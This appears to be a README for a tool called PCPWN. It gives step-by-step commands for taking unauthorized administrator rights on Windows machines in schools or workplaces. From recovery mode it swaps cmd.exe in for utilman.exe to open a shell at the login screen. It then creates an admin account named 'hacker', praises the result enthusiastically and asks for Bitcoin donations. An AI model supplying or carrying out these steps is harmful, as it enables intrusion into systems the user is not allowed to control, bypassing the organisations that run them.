PCPWN is an informative tutorial that guides you through the process of gaining unauthorized access to administrative privileges on a computer within a school or corporate environment, all without relying on the pre-existing company-created admin account.
Start by accessing recovery mode on the target system. 7 Quick Ways to Boot Into the Windows Recovery Environment
Press and hold the Windows Key and press the power button.
Release both keys.
Click the Power Button icon.
Hold the SHIFT Key and click Restart.
|
|
|
|
|
Search "recovery start-up" > click recovery start-up.
Click Restart Now button under the Advanced start-up section. The computer should restart and enter recovery mode.
then navigate to "Troubleshoot," click "Advanced option" and finally, select "Command Prompt."
In the Command Prompt, type the following command:
wmic logicaldisk get caption - List available drives
c: - Change to the C: drive
cd Windows\System32 - Navigate to the System32 folder
ren utilman.exe utilman.exe.bak - Rename utilman.exe to utilman.exe.bak
copy cmd.exe utilman.exe - Copy cmd.exe to utilman.exe
exit - exit the command prompt
Return to the login screen and click on "Ease of Access Icon."
In the Command Prompt, type the following command:
net user hacker hacker /add - Create a new user named "hacker" with password "hacker"
net localgroup Administrators hacker /add - Add the user "hacker" to the Administrators group
Log in with your non-administrator account.
Open PowerShell as an administrator.
Type username: DOMAIN\hacker password: hacker
Guess what? You've got the keys to the kingdom now! Your regular account? Well, it's not so regular anymore. It's been upgraded to full-on admin mode. That means you're not just a regular user – you're the boss.
With these admin superpowers, you can do a whole bunch of cool stuff. Need to tweak some settings? No problem. Want to add or manage users? Easy peasy. It's like having a backstage pass to the entire system. So go ahead, explore, and make this digital world yours!
- Windows 11
- Windows 10
- Windows 7
To restore utilman.exe, in the Command Prompt type in:
C:
cd windows\system32
del utilman.exe
ren utilman.exe.bak utilman.exe
Then reboot the system.
If you find my work helpful and want to support me, consider making a donation. Your contribution will help me continue working on open-source projects.
Bitcoin Address: 36ALguYpTgFF3RztL4h2uFb3cRMzQALAcm